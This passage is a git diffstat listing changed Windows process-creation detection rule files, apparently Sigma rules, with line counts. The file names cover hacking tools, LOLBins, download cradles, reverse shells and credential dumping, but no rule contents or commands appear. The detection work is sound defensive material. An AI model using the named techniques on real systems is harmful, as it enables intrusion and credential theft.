...tion_win_agentexecutor_potential_abuse.yml | 28 +- ..._creation_win_agentexecutor_susp_usage.yml | 27 +- ...tion_win_appvlp_uncommon_child_process.yml | 31 +- ...creation_win_aspnet_compiler_exectuion.yml | 21 +- ...win_aspnet_compiler_susp_child_process.yml | 37 +- ...reation_win_aspnet_compiler_susp_paths.yml | 24 +- ..._creation_win_at_interactive_execution.yml | 7 +- .../proc_creation_win_attrib_hiding_files.yml | 13 +- .../proc_creation_win_attrib_system.yml | 13 +- ..._creation_win_attrib_system_susp_paths.yml | 26 +- ...ion_win_auditpol_nt_resource_kit_usage.yml | 21 +- ...c_creation_win_auditpol_susp_execution.yml | 31 +- ...oc_creation_win_bash_command_execution.yml | 14 +- .../proc_creation_win_bash_file_execution.yml | 25 +- ..._creation_win_bcdedit_boot_conf_tamper.yml | 22 +- ...oc_creation_win_bcdedit_susp_execution.yml | 6 +- ...on_win_bginfo_suspicious_child_process.yml | 39 +- 
...tion_win_bginfo_uncommon_child_process.yml | 7 +- .../proc_creation_win_bitsadmin_download.yml | 10 +- ...ation_win_bitsadmin_download_direct_ip.yml | 17 +- ...itsadmin_download_file_sharing_domains.yml | 10 +- ...win_bitsadmin_download_susp_extensions.yml | 8 +- ...n_bitsadmin_download_susp_targetfolder.yml | 11 +- ...tsadmin_download_uncommon_targetfolder.yml | 8 +- ...on_win_bitsadmin_potential_persistence.yml | 15 +- ...n_browsers_chromium_headless_debugging.yml | 12 +- ...on_win_browsers_chromium_headless_exec.yml | 8 +- ...owsers_chromium_headless_file_download.yml | 11 +- ...n_win_browsers_chromium_load_extension.yml | 14 +- ...on_win_browsers_chromium_mockbin_abuse.yml | 10 +- ..._browsers_chromium_susp_load_extension.yml | 11 +- ...tion_win_browsers_inline_file_download.yml | 11 +- ...creation_win_browsers_remote_debugging.yml | 14 +- ...oc_creation_win_browsers_tor_execution.yml | 2 +- .../proc_creation_win_calc_uncommon_exec.yml | 16 +- ...n_win_certmgr_certificate_installation.yml | 28 +- .../proc_creation_win_certoc_download.yml | 10 +- ...creation_win_certoc_download_direct_ip.yml | 12 +- .../proc_creation_win_certoc_load_dll.yml | 13 +- ...ion_win_certoc_load_dll_susp_locations.yml | 15 +- ..._win_certutil_certificate_installation.yml | 30 +- .../proc_creation_win_certutil_decode.yml | 12 +- .../proc_creation_win_certutil_download.yml | 18 +- ...eation_win_certutil_download_direct_ip.yml | 44 +- ...certutil_download_file_sharing_domains.yml | 21 +- .../proc_creation_win_certutil_encode.yml | 15 +- ...on_win_certutil_encode_susp_extensions.yml | 15 +- ...tion_win_certutil_encode_susp_location.yml | 16 +- .../proc_creation_win_certutil_export_pfx.yml | 15 +- ...oc_creation_win_certutil_ntlm_coercion.yml | 6 +- ...proc_creation_win_chcp_codepage_switch.yml | 18 +- ...tion_win_cipher_overwrite_deleted_data.yml | 20 +- ...ion_win_citrix_trolleyexpress_procdump.yml | 11 +- .../proc_creation_win_clip_execution.yml | 8 +- 
...ion_win_cloudflared_portable_execution.yml | 10 +- ..._win_cloudflared_quicktunnel_execution.yml | 122 +- ...reation_win_cloudflared_tunnel_cleanup.yml | 7 +- ...oc_creation_win_cloudflared_tunnel_run.yml | 8 +- .../proc_creation_win_cmd_assoc_execution.yml | 23 +- ..._cmd_assoc_tamper_exe_file_association.yml | 26 +- ...c_creation_win_cmd_copy_dmp_from_share.yml | 12 +- ...ation_win_cmd_curl_download_exec_combo.yml | 7 +- .../proc_creation_win_cmd_del_execution.yml | 33 +- ...c_creation_win_cmd_del_greedy_deletion.yml | 14 +- .../proc_creation_win_cmd_dir_execution.yml | 5 +- .../proc_creation_win_cmd_dosfuscation.yml | 5 +- .../proc_creation_win_cmd_http_appdata.yml | 10 +- .../proc_creation_win_cmd_mklink_osk_cmd.yml | 11 +- ...md_mklink_shadow_copies_access_symlink.yml | 5 +- ...reation_win_cmd_net_use_and_exec_combo.yml | 12 +- ...oc_creation_win_cmd_no_space_execution.yml | 33 +- ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 6 +- .../proc_creation_win_cmd_path_traversal.yml | 31 +- ...n_win_cmd_ping_copy_combined_execution.yml | 14 +- ...on_win_cmd_ping_del_combined_execution.yml | 16 +- .../proc_creation_win_cmd_redirect.yml | 18 +- ...eation_win_cmd_redirection_susp_folder.yml | 28 +- .../proc_creation_win_cmd_rmdir_execution.yml | 23 +- ...roc_creation_win_cmd_shadowcopy_access.yml | 7 +- .../proc_creation_win_cmd_stdin_redirect.yml | 10 +- ...cmd_sticky_key_like_backdoor_execution.yml | 12 +- ...c_creation_win_cmd_sticky_keys_replace.yml | 10 +- .../proc_creation_win_cmd_unusual_parent.yml | 2 +- ...eation_win_cmdkey_adding_generic_creds.yml | 9 +- .../proc_creation_win_cmdkey_recon.yml | 9 +- ...eation_win_cmstp_execution_by_creation.yml | 4 +- ...roc_creation_win_conhost_legacy_option.yml | 6 +- ...reation_win_conhost_susp_child_process.yml | 14 +- ...c_creation_win_conhost_uncommon_parent.yml | 13 +- .../proc_creation_win_control_panel_item.yml | 15 +- ...eation_win_createdump_lolbin_execution.yml | 14 +- 
...ation_win_csc_susp_dynamic_compilation.yml | 51 +- .../proc_creation_win_csc_susp_parent.yml | 60 +- .../proc_creation_win_csi_execution.yml | 18 +- .../proc_creation_win_csvde_export.yml | 11 +- ...roc_creation_win_curl_cookie_hijacking.yml | 11 +- ...oc_creation_win_curl_custom_user_agent.yml | 12 +- ...ation_win_curl_download_direct_ip_exec.yml | 19 +- ...url_download_direct_ip_susp_extensions.yml | 18 +- ...url_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_curl_insecure_connection.yml | 8 +- ...reation_win_curl_insecure_porxy_or_doh.yml | 9 +- ...proc_creation_win_curl_local_file_read.yml | 9 +- .../proc_creation_win_curl_susp_download.yml | 28 +- ...desktopimgdownldr_remote_file_download.yml | 8 +- ...n_win_desktopimgdownldr_susp_execution.yml | 12 +- ...ion_win_deviceenroller_dll_sideloading.yml | 20 +- ...proc_creation_win_devinit_lolbin_usage.yml | 6 +- ...n_win_dfsvc_suspicious_child_processes.yml | 6 +- .../proc_creation_win_dirlister_execution.yml | 8 +- ...tion_win_diskshadow_child_process_susp.yml | 26 +- ...on_win_diskshadow_script_mode_susp_ext.yml | 36 +- ...n_diskshadow_script_mode_susp_location.yml | 31 +- ..._creation_win_dll_sideload_vmware_xfer.yml | 9 +- ..._creation_win_dllhost_no_cli_execution.yml | 10 +- ...n_win_dns_exfiltration_tools_execution.yml | 4 +- ...oc_creation_win_dns_susp_child_process.yml | 6 +- .../proc_creation_win_dnscmd_discovery.yml | 7 +- ...md_install_new_server_level_plugin_dll.yml | 16 +- ...tion_win_dotnet_trace_lolbin_execution.yml | 6 +- .../proc_creation_win_driverquery_recon.yml | 31 +- .../proc_creation_win_driverquery_usage.yml | 35 +- ..._creation_win_dsacls_abuse_permissions.yml | 8 +- ...roc_creation_win_dsacls_password_spray.yml | 6 +- .../proc_creation_win_dsim_remove.yml | 17 +- ...ion_win_dsquery_domain_trust_discovery.yml | 14 +- .../proc_creation_win_dtrace_kernel_dump.yml | 9 +- ...oc_creation_win_dumpminitool_execution.yml | 21 +- ...eation_win_dumpminitool_susp_execution.yml | 29 
+- .../proc_creation_win_esentutl_params.yml | 6 +- ...ation_win_esentutl_sensitive_file_copy.yml | 16 +- .../proc_creation_win_esentutl_webcache.yml | 11 +- ...eation_win_eventvwr_susp_child_process.yml | 9 +- ...ltration_and_tunneling_tools_execution.yml | 2 +- ...proc_creation_win_expand_cabinet_files.yml | 33 +- ...eation_win_explorer_break_process_tree.yml | 24 +- ...creation_win_explorer_lolbin_execution.yml | 4 +- .../proc_creation_win_explorer_nouaccheck.yml | 12 +- .../proc_creation_win_findstr_download.yml | 26 +- ...roc_creation_win_findstr_gpp_passwords.yml | 17 +- .../proc_creation_win_findstr_lnk.yml | 17 +- .../proc_creation_win_findstr_lsass.yml | 19 +- ...oc_creation_win_findstr_recon_everyone.yml | 28 +- ...creation_win_findstr_recon_pipe_output.yml | 15 +- ...on_win_findstr_security_keyword_lookup.yml | 31 +- ..._creation_win_findstr_subfolder_search.yml | 25 +- ..._sysmon_discovery_via_default_altitude.yml | 18 +- .../proc_creation_win_finger_usage.yml | 7 +- .../proc_creation_win_fltmc_unload_driver.yml | 13 +- ...reation_win_fltmc_unload_driver_sysmon.yml | 10 +- ...in_forfiles_child_process_masquerading.yml | 18 +- ...creation_win_forfiles_proxy_execution_.yml | 27 +- ..._creation_win_fsutil_drive_enumeration.yml | 6 +- ..._creation_win_fsutil_symlinkevaluation.yml | 16 +- .../proc_creation_win_fsutil_usage.yml | 19 +- ...ownloadwrapper_arbitrary_file_download.yml | 9 +- .../proc_creation_win_git_susp_clone.yml | 17 +- ...on_win_googleupdate_susp_child_process.yml | 17 +- .../proc_creation_win_gpg4win_decryption.yml | 10 +- .../proc_creation_win_gpg4win_encryption.yml | 10 +- ...reation_win_gpg4win_portable_execution.yml | 15 +- ...roc_creation_win_gpg4win_susp_location.yml | 17 +- .../proc_creation_win_gpresult_execution.yml | 7 +- ...ion_win_gup_arbitrary_binary_execution.yml | 11 +- .../proc_creation_win_gup_download.yml | 12 +- ..._creation_win_gup_suspicious_execution.yml | 11 +- .../proc_creation_win_hh_chm_execution.yml | 6 +- 
...in_hh_chm_remote_download_or_execution.yml | 9 +- ...on_win_hh_html_help_susp_child_process.yml | 2 +- .../proc_creation_win_hh_susp_execution.yml | 11 +- .../proc_creation_win_hktl_adcspwn.yml | 6 +- ...reation_win_hktl_bloodhound_sharphound.yml | 25 +- ..._creation_win_hktl_c3_rundll32_pattern.yml | 2 +- .../proc_creation_win_hktl_certify.yml | 13 +- .../proc_creation_win_hktl_certipy.yml | 13 +- ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 15 +- ...win_hktl_cobaltstrike_bloopers_modules.yml | 10 +- ...win_hktl_cobaltstrike_load_by_rundll32.yml | 17 +- ...win_hktl_cobaltstrike_process_patterns.yml | 8 +- .../proc_creation_win_hktl_coercedpotato.yml | 20 +- .../proc_creation_win_hktl_covenant.yml | 6 +- ...eation_win_hktl_crackmapexec_execution.yml | 23 +- ...n_hktl_crackmapexec_execution_patterns.yml | 7 +- ...reation_win_hktl_crackmapexec_patterns.yml | 13 +- ...tl_crackmapexec_powershell_obfuscation.yml | 20 +- .../proc_creation_win_hktl_createminidump.yml | 9 +- .../proc_creation_win_hktl_dinjector.yml | 7 +- .../proc_creation_win_hktl_edrsilencer.yml | 13 +- ...tion_win_hktl_empire_powershell_launch.yml | 2 +- ..._win_hktl_empire_powershell_uac_bypass.yml | 2 +- .../proc_creation_win_hktl_evil_winrm.yml | 8 +- ...ation_win_hktl_execution_via_imphashes.yml | 355 +- .../proc_creation_win_hktl_gmer.yml | 8 +- .../proc_creation_win_hktl_handlekatz.yml | 23 +- .../proc_creation_win_hktl_hashcat.yml | 7 +- ...c_creation_win_hktl_htran_or_natbypass.yml | 7 +- .../proc_creation_win_hktl_hydra.yml | 7 +- ...ion_win_hktl_impacket_lateral_movement.yml | 38 +- .../proc_creation_win_hktl_impacket_tools.yml | 92 +- .../proc_creation_win_hktl_impersonate.yml | 13 +- .../proc_creation_win_hktl_inveigh.yml | 25 +- ...ation_win_hktl_invoke_obfuscation_clip.yml | 9 +- ...obfuscation_obfuscated_iex_commandline.yml | 17 +- ...tion_win_hktl_invoke_obfuscation_stdin.yml | 17 +- ...eation_win_hktl_invoke_obfuscation_var.yml | 9 +- ...n_hktl_invoke_obfuscation_via_compress.yml 
| 6 +- ..._win_hktl_invoke_obfuscation_via_stdin.yml | 7 +- ...n_hktl_invoke_obfuscation_via_use_clip.yml | 9 +- ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 4 +- ...on_win_hktl_invoke_obfuscation_via_var.yml | 9 +- ...eation_win_hktl_jlaive_batch_execution.yml | 12 +- .../proc_creation_win_hktl_koadic.yml | 6 +- .../proc_creation_win_hktl_krbrelay.yml | 10 +- .../proc_creation_win_hktl_krbrelayup.yml | 13 +- .../proc_creation_win_hktl_localpotato.yml | 7 +- ...reation_win_hktl_meterpreter_getsystem.yml | 19 +- ...reation_win_hktl_mimikatz_command_line.yml | 33 +- .../proc_creation_win_hktl_pchunter.yml | 33 +- ...tl_powersploit_empire_default_schtasks.yml | 6 +- .../proc_creation_win_hktl_powertool.yml | 12 +- ...eation_win_hktl_purplesharp_indicators.yml | 6 +- .../proc_creation_win_hktl_pypykatz.yml | 8 +- .../proc_creation_win_hktl_quarks_pwdump.yml | 4 +- ...on_win_hktl_redmimicry_winnti_playbook.yml | 7 +- ..._creation_win_hktl_relay_attacks_tools.yml | 21 +- .../proc_creation_win_hktl_rubeus.yml | 45 +- .../proc_creation_win_hktl_safetykatz.yml | 9 +- .../proc_creation_win_hktl_secutyxploded.yml | 6 +- .../proc_creation_win_hktl_selectmyparent.yml | 61 +- .../proc_creation_win_hktl_sharp_chisel.yml | 9 +- ..._creation_win_hktl_sharp_impersonation.yml | 29 +- ...c_creation_win_hktl_sharp_ldap_monitor.yml | 9 +- .../proc_creation_win_hktl_sharpersist.yml | 15 +- .../proc_creation_win_hktl_sharpevtmute.yml | 17 +- ...proc_creation_win_hktl_sharpldapwhoami.yml | 13 +- .../proc_creation_win_hktl_sharpup.yml | 20 +- .../proc_creation_win_hktl_sharpview.yml | 203 +- ...n_win_hktl_sliver_c2_execution_pattern.yml | 5 +- ...ation_win_hktl_stracciatella_execution.yml | 23 +- .../proc_creation_win_hktl_sysmoneop.yml | 14 +- .../proc_creation_win_hktl_trufflesnout.yml | 7 +- .../proc_creation_win_hktl_uacme.yml | 31 +- .../proc_creation_win_hktl_wce.yml | 16 +- .../proc_creation_win_hktl_winpeas.yml | 43 +- .../proc_creation_win_hktl_winpwn.yml | 12 +- 
...on_win_hktl_wmiexec_default_powershell.yml | 5 +- .../proc_creation_win_hktl_xordump.yml | 12 +- .../proc_creation_win_hktl_zipexec.yml | 7 +- .../proc_creation_win_hostname_execution.yml | 2 +- .../proc_creation_win_hwp_exploits.yml | 5 +- .../proc_creation_win_icacls_deny.yml | 11 +- .../proc_creation_win_ieexec_download.yml | 6 +- ...c_creation_win_iis_appcmd_http_logging.yml | 9 +- ...appcmd_service_account_password_dumped.yml | 24 +- ...ion_win_iis_appcmd_susp_module_install.yml | 11 +- ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 10 +- ..._win_iis_connection_strings_decryption.yml | 11 +- ...ation_win_iis_susp_module_registration.yml | 11 +- ...ion_win_imagingdevices_unusual_parents.yml | 7 +- .../proc_creation_win_imewbdld_download.yml | 11 +- ..._infdefaultinstall_execute_sct_scripts.yml | 5 +- ...proc_creation_win_installutil_download.yml | 12 +- ...eation_win_instalutil_no_log_execution.yml | 9 +- ...on_win_java_keytool_susp_child_process.yml | 5 +- ...n_java_manageengine_susp_child_process.yml | 17 +- ...roc_creation_win_java_remote_debugging.yml | 9 +- ...c_creation_win_java_susp_child_process.yml | 11 +- ...creation_win_java_susp_child_process_2.yml | 11 +- .../proc_creation_win_kd_execution.yml | 7 +- ...on_win_ksetup_password_change_computer.yml | 9 +- ...eation_win_ksetup_password_change_user.yml | 6 +- .../proc_creation_win_ldifde_export.yml | 11 +- .../proc_creation_win_ldifde_file_load.yml | 13 +- ...n_lodctr_performance_counter_tampering.yml | 9 +- ...c_creation_win_logman_disable_eventlog.yml | 13 +- .../proc_creation_win_lolbin_cdb.yml | 11 +- ...creation_win_lolbin_class_exec_xwizard.yml | 9 +- .../proc_creation_win_lolbin_cmdl32.yml | 6 +- ...eation_win_lolbin_configsecuritypolicy.yml | 11 +- ...oc_creation_win_lolbin_customshellhost.yml | 5 +- ...data_exfiltration_by_using_datasvcutil.yml | 13 +- ...eation_win_lolbin_dctask64_proc_inject.yml | 4 +- .../proc_creation_win_lolbin_defaultpack.yml | 3 +- 
...in_lolbin_device_credential_deployment.yml | 5 +- ...c_creation_win_lolbin_devtoolslauncher.yml | 4 +- .../proc_creation_win_lolbin_diantz_ads.yml | 7 +- ..._creation_win_lolbin_diantz_remote_cab.yml | 5 +- ...eation_win_lolbin_dll_sideload_xwizard.yml | 7 +- .../proc_creation_win_lolbin_dnx.yml | 2 +- .../proc_creation_win_lolbin_dotnet.yml | 6 +- .../proc_creation_win_lolbin_dotnet_dump.yml | 13 +- .../proc_creation_win_lolbin_dump64.yml | 12 +- .../proc_creation_win_lolbin_extexport.yml | 9 +- .../proc_creation_win_lolbin_extrac32.yml | 10 +- .../proc_creation_win_lolbin_extrac32_ads.yml | 4 +- .../proc_creation_win_lolbin_format.yml | 10 +- ...reation_win_lolbin_fsharp_interpreters.yml | 11 +- .../proc_creation_win_lolbin_ftp.yml | 9 +- ...reation_win_lolbin_gather_network_info.yml | 25 +- .../proc_creation_win_lolbin_gpscript.yml | 9 +- .../proc_creation_win_lolbin_ie4uinit.yml | 12 +- .../proc_creation_win_lolbin_ilasm.yml | 4 +- .../proc_creation_win_lolbin_jsc.yml | 7 +- .../proc_creation_win_lolbin_kavremover.yml | 10 +- ..._creation_win_lolbin_launch_vsdevshell.yml | 7 +- .../proc_creation_win_lolbin_manage_bde.yml | 14 +- ...win_lolbin_mavinject_process_injection.yml | 11 +- .../proc_creation_win_lolbin_mpiexec.yml | 11 +- .../proc_creation_win_lolbin_msdeploy.yml | 4 +- ...c_creation_win_lolbin_msdt_answer_file.yml | 10 +- .../proc_creation_win_lolbin_openconsole.yml | 9 +- .../proc_creation_win_lolbin_openwith.yml | 4 +- .../proc_creation_win_lolbin_pcalua.yml | 15 +- .../proc_creation_win_lolbin_pcwrun.yml | 6 +- ...roc_creation_win_lolbin_pcwrun_follina.yml | 7 +- .../proc_creation_win_lolbin_pcwutl.yml | 9 +- .../proc_creation_win_lolbin_pester.yml | 7 +- .../proc_creation_win_lolbin_pester_1.yml | 13 +- .../proc_creation_win_lolbin_printbrm.yml | 7 +- .../proc_creation_win_lolbin_pubprn.yml | 5 +- ...tion_win_lolbin_rasautou_dll_execution.yml | 14 +- .../proc_creation_win_lolbin_register_app.yml | 8 +- .../proc_creation_win_lolbin_remote.yml | 7 
+- .../proc_creation_win_lolbin_replace.yml | 7 +- .../proc_creation_win_lolbin_runexehelper.yml | 3 +- ...oc_creation_win_lolbin_runscripthelper.yml | 4 +- .../proc_creation_win_lolbin_scriptrunner.yml | 9 +- .../proc_creation_win_lolbin_setres.yml | 6 +- .../proc_creation_win_lolbin_sftp.yml | 10 +- ...eation_win_lolbin_sideload_link_binary.yml | 9 +- .../proc_creation_win_lolbin_sigverif.yml | 3 +- .../proc_creation_win_lolbin_ssh.yml | 11 +- ...eation_win_lolbin_susp_acccheckconsole.yml | 9 +- ...proc_creation_win_lolbin_susp_atbroker.yml | 6 +- ...ation_win_lolbin_susp_certreq_download.yml | 9 +- ...olbin_susp_driver_installed_by_pnputil.yml | 13 +- .../proc_creation_win_lolbin_susp_dxcap.yml | 6 +- .../proc_creation_win_lolbin_susp_grpconv.yml | 5 +- ...ion_win_lolbin_susp_sqldumper_activity.yml | 4 +- ...n_syncappvpublishingserver_execute_psh.yml | 10 +- ...ncappvpublishingserver_vbs_execute_psh.yml | 4 +- .../proc_creation_win_lolbin_tracker.yml | 12 +- .../proc_creation_win_lolbin_ttdinject.yml | 7 +- ..._creation_win_lolbin_tttracer_mod_load.yml | 9 +- .../proc_creation_win_lolbin_type.yml | 10 +- .../proc_creation_win_lolbin_unregmp2.yml | 9 +- ...c_creation_win_lolbin_utilityfunctions.yml | 5 +- ...ation_win_lolbin_visual_basic_compiler.yml | 7 +- ...ation_win_lolbin_visualuiaverifynative.yml | 7 +- ...c_creation_win_lolbin_vsiisexelauncher.yml | 9 +- .../proc_creation_win_lolbin_wfc.yml | 7 +- .../proc_creation_win_lolbin_wlrmdr.yml | 12 +- ..._creation_win_lolbin_workflow_compiler.yml | 7 +- ...oc_creation_win_lolscript_register_app.yml | 19 +- .../proc_creation_win_lsass_process_clone.yml | 5 +- ..._creation_win_malware_conti_shadowcopy.yml | 9 +- ...oc_creation_win_malware_script_dropper.yml | 6 +- ...roc_creation_win_mftrace_child_process.yml | 3 +- ...reation_win_mmc_mmc20_lateral_movement.yml | 8 +- ...oc_creation_win_mmc_susp_child_process.yml | 22 +- .../proc_creation_win_mofcomp_execution.yml | 55 +- 
...ion_win_mpcmdrun_dll_sideload_defender.yml | 11 +- ...n_win_mpcmdrun_download_arbitrary_file.yml | 10 +- ...run_remove_windows_defender_definition.yml | 9 +- ...eation_win_msbuild_susp_parent_process.yml | 4 +- ...n_win_msdt_arbitrary_command_execution.yml | 16 +- ...roc_creation_win_msdt_susp_cab_options.yml | 13 +- .../proc_creation_win_msdt_susp_parent.yml | 8 +- ...roc_creation_win_msedge_proxy_download.yml | 6 +- .../proc_creation_win_mshta_http.yml | 10 +- ...roc_creation_win_mshta_inline_vbscript.yml | 8 +- .../proc_creation_win_mshta_javascript.yml | 6 +- ...creation_win_mshta_lethalhta_technique.yml | 5 +- ...reation_win_mshta_susp_child_processes.yml | 45 +- ...proc_creation_win_mshta_susp_execution.yml | 12 +- .../proc_creation_win_mshta_susp_pattern.yml | 32 +- .../proc_creation_win_msiexec_dll.yml | 8 +- .../proc_creation_win_msiexec_embedding.yml | 17 +- .../proc_creation_win_msiexec_execute_dll.yml | 19 +- ...roc_creation_win_msiexec_install_quiet.yml | 20 +- ...oc_creation_win_msiexec_install_remote.yml | 16 +- ...proc_creation_win_msiexec_masquerading.yml | 6 +- .../proc_creation_win_msiexec_web_install.yml | 9 +- .../proc_creation_win_msohtmed_download.yml | 6 +- .../proc_creation_win_mspub_download.yml | 9 +- ...reation_win_mssql_sqlps_susp_execution.yml | 21 +- ...on_win_mssql_sqltoolsps_susp_execution.yml | 20 +- ..._creation_win_mssql_susp_child_process.yml | 14 +- ...n_win_mssql_veaam_susp_child_processes.yml | 13 +- ...reation_win_mstsc_rdp_hijack_shadowing.yml | 2 +- ...c_creation_win_mstsc_remote_connection.yml | 19 +- ..._creation_win_mstsc_run_local_rdp_file.yml | 8 +- ...mstsc_run_local_rdp_file_susp_location.yml | 15 +- ...n_mstsc_run_local_rpd_file_susp_parent.yml | 9 +- .../proc_creation_win_msxsl_execution.yml | 14 +- ...oc_creation_win_msxsl_remote_execution.yml | 7 +- ..._win_net_default_accounts_manipulation.yml | 78 +- ...tion_win_net_groups_and_accounts_recon.yml | 48 +- ..._win_net_network_connections_discovery.yml | 28 +- 
...eation_win_net_share_and_sessions_enum.yml | 19 +- .../proc_creation_win_net_share_unmount.yml | 18 +- .../proc_creation_win_net_start_service.yml | 17 +- .../proc_creation_win_net_stop_service.yml | 21 +- .../proc_creation_win_net_susp_execution.yml | 20 +- ...creation_win_net_use_mount_admin_share.yml | 21 +- ...ation_win_net_use_mount_internet_share.yml | 17 +- .../proc_creation_win_net_use_mount_share.yml | 18 +- ...reation_win_net_use_password_plaintext.yml | 16 +- .../proc_creation_win_net_user_add.yml | 18 +- ...creation_win_net_user_add_never_expire.yml | 21 +- .../proc_creation_win_netsh_fw_add_rule.yml | 14 +- ...etsh_fw_allow_program_in_susp_location.yml | 31 +- .../proc_creation_win_netsh_fw_allow_rdp.yml | 14 +- ...proc_creation_win_netsh_fw_delete_rule.yml | 11 +- .../proc_creation_win_netsh_fw_disable.yml | 12 +- ...reation_win_netsh_fw_enable_group_rule.yml | 9 +- ..._creation_win_netsh_fw_rules_discovery.yml | 11 +- .../proc_creation_win_netsh_fw_set_rule.yml | 11 +- ...ation_win_netsh_helper_dll_persistence.yml | 21 +- ...proc_creation_win_netsh_packet_capture.yml | 9 +- ...roc_creation_win_netsh_port_forwarding.yml | 25 +- ...reation_win_netsh_port_forwarding_3389.yml | 9 +- ...n_win_netsh_wifi_credential_harvesting.yml | 6 +- .../proc_creation_win_nltest_execution.yml | 12 +- .../proc_creation_win_nltest_recon.yml | 40 +- .../proc_creation_win_node_abuse.yml | 11 +- ...on_win_node_adobe_creative_cloud_abuse.yml | 7 +- ...creation_win_nslookup_domain_discovery.yml | 8 +- ...eation_win_nslookup_poweshell_download.yml | 17 +- .../proc_creation_win_ntdsutil_susp_usage.yml | 28 +- .../proc_creation_win_ntdsutil_usage.yml | 5 +- ...c_creation_win_odbcconf_driver_install.yml | 18 +- ...ation_win_odbcconf_driver_install_susp.yml | 17 +- ...ation_win_odbcconf_exec_susp_locations.yml | 10 +- ...ation_win_odbcconf_register_dll_regsvr.yml | 22 +- ..._win_odbcconf_register_dll_regsvr_susp.yml | 17 +- ...oc_creation_win_odbcconf_response_file.yml | 27 +- 
...eation_win_odbcconf_response_file_susp.yml | 24 +- ...on_win_odbcconf_uncommon_child_process.yml | 7 +- ...tion_win_office_arbitrary_cli_download.yml | 22 +- ...win_office_excel_dcom_lateral_movement.yml | 22 +- ...win_office_exec_from_trusted_locations.yml | 27 +- ...in_office_onenote_susp_child_processes.yml | 170 +- ...utlook_enable_unsafe_client_mail_rules.yml | 9 +- ...win_office_outlook_execution_from_temp.yml | 2 +- ...in_office_outlook_susp_child_processes.yml | 34 +- ...ce_outlook_susp_child_processes_remote.yml | 9 +- ..._office_spawn_exe_from_users_directory.yml | 10 +- ...eation_win_office_susp_child_processes.yml | 170 +- ...c_creation_win_office_winword_dll_load.yml | 13 +- ...flinescannershell_mpclient_sideloading.yml | 16 +- ...ion_win_pdqdeploy_runner_susp_children.yml | 68 +- ...tion_win_perl_inline_command_execution.yml | 9 +- ...ation_win_php_inline_command_execution.yml | 9 +- .../proc_creation_win_ping_hex_ip.yml | 4 +- .../proc_creation_win_pktmon_execution.yml | 4 +- ...proc_creation_win_plink_susp_tunneling.yml | 14 +- .../proc_creation_win_powercfg_execution.yml | 26 +- ...ershell_aadinternals_cmdlets_execution.yml | 23 +- ...ell_active_directory_module_dll_import.yml | 27 +- ..._win_powershell_add_windows_capability.yml | 26 +- ...win_powershell_amsi_init_failed_bypass.yml | 11 +- ...n_win_powershell_amsi_null_bits_bypass.yml | 9 +- ..._creation_win_powershell_audio_capture.yml | 5 +- ...tion_win_powershell_base64_encoded_cmd.yml | 31 +- ...win_powershell_base64_frombase64string.yml | 14 +- ...roc_creation_win_powershell_base64_iex.yml | 49 +- ..._creation_win_powershell_base64_invoke.yml | 23 +- ...ion_win_powershell_base64_mppreference.yml | 40 +- ...rshell_base64_reflection_assembly_load.yml | 10 +- ...base64_reflection_assembly_load_obfusc.yml | 15 +- ...tion_win_powershell_base64_wmi_classes.yml | 34 +- ..._creation_win_powershell_cl_invocation.yml | 6 +- ...reation_win_powershell_cl_loadassembly.yml | 7 +- 
...ation_win_powershell_cl_mutexverifiers.yml | 14 +- ...ershell_cmdline_convertto_securestring.yml | 17 +- ...in_powershell_cmdline_reversed_strings.yml | 24 +- ..._powershell_cmdline_special_characters.yml | 29 +- ...hell_computer_discovery_get_adcomputer.yml | 26 +- ...creation_win_powershell_create_service.yml | 6 +- ...oc_creation_win_powershell_decode_gzip.yml | 6 +- ...reation_win_powershell_decrypt_pattern.yml | 29 +- ...in_powershell_defender_disable_feature.yml | 14 +- ...tion_win_powershell_defender_exclusion.yml | 11 +- ...isable_defender_av_security_monitoring.yml | 31 +- ...eation_win_powershell_disable_firewall.yml | 22 +- ...ion_win_powershell_disable_ie_features.yml | 9 +- ..._creation_win_powershell_dll_execution.yml | 25 +- ...eation_win_powershell_downgrade_attack.yml | 11 +- ...on_win_powershell_download_com_cradles.yml | 11 +- ...eation_win_powershell_download_cradles.yml | 2 +- ...c_creation_win_powershell_download_dll.yml | 7 +- ...c_creation_win_powershell_download_iex.yml | 7 +- ...ation_win_powershell_download_patterns.yml | 23 +- ...oc_creation_win_powershell_email_exfil.yml | 4 +- ...l_enable_susp_windows_optional_feature.yml | 19 +- .../proc_creation_win_powershell_encode.yml | 6 +- ...on_win_powershell_encoded_cmd_patterns.yml | 22 +- ...creation_win_powershell_encoded_obfusc.yml | 13 +- ...ation_win_powershell_encoding_patterns.yml | 30 +- ...creation_win_powershell_exec_data_file.yml | 6 +- ...tion_win_powershell_export_certificate.yml | 13 +- ...eation_win_powershell_frombase64string.yml | 5 +- ...in_powershell_frombase64string_archive.yml | 9 +- ..._creation_win_powershell_get_clipboard.yml | 6 +- ...powershell_get_localgroup_member_recon.yml | 21 +- ...eation_win_powershell_getprocess_lsass.yml | 6 +- ...creation_win_powershell_hidden_b64_cmd.yml | 19 +- ...wershell_hide_services_via_set_service.yml | 21 +- ...c_creation_win_powershell_iex_patterns.yml | 8 +- ..._powershell_import_cert_susp_locations.yml | 7 +- 
...win_powershell_import_module_susp_dirs.yml | 7 +- ...ershell_install_unsigned_appx_packages.yml | 23 +- ...ion_win_powershell_invocation_specific.yml | 26 +- ...powershell_invoke_webrequest_direct_ip.yml | 21 +- ..._powershell_invoke_webrequest_download.yml | 26 +- ...ion_win_powershell_mailboxexport_share.yml | 5 +- ...ation_win_powershell_malicious_cmdlets.yml | 27 +- ..._powershell_msexchange_transport_agent.yml | 9 +- ...n_powershell_non_interactive_execution.yml | 23 +- ...on_win_powershell_obfuscation_via_utf8.yml | 2 +- ..._creation_win_powershell_public_folder.yml | 7 +- ...wershell_remotefxvgpudisablement_abuse.yml | 18 +- ...in_powershell_reverse_shell_connection.yml | 18 +- ...ion_win_powershell_run_script_from_ads.yml | 4 +- ...owershell_run_script_from_input_stream.yml | 4 +- ...roc_creation_win_powershell_sam_access.yml | 4 +- ...on_win_powershell_script_engine_parent.yml | 5 +- ..._service_dacl_modification_set_service.yml | 18 +- .../proc_creation_win_powershell_set_acl.yml | 26 +- ...n_win_powershell_set_acl_susp_location.yml | 34 +- ...ershell_set_policies_to_unsecure_level.yml | 31 +- ...on_win_powershell_set_service_disabled.yml | 11 +- 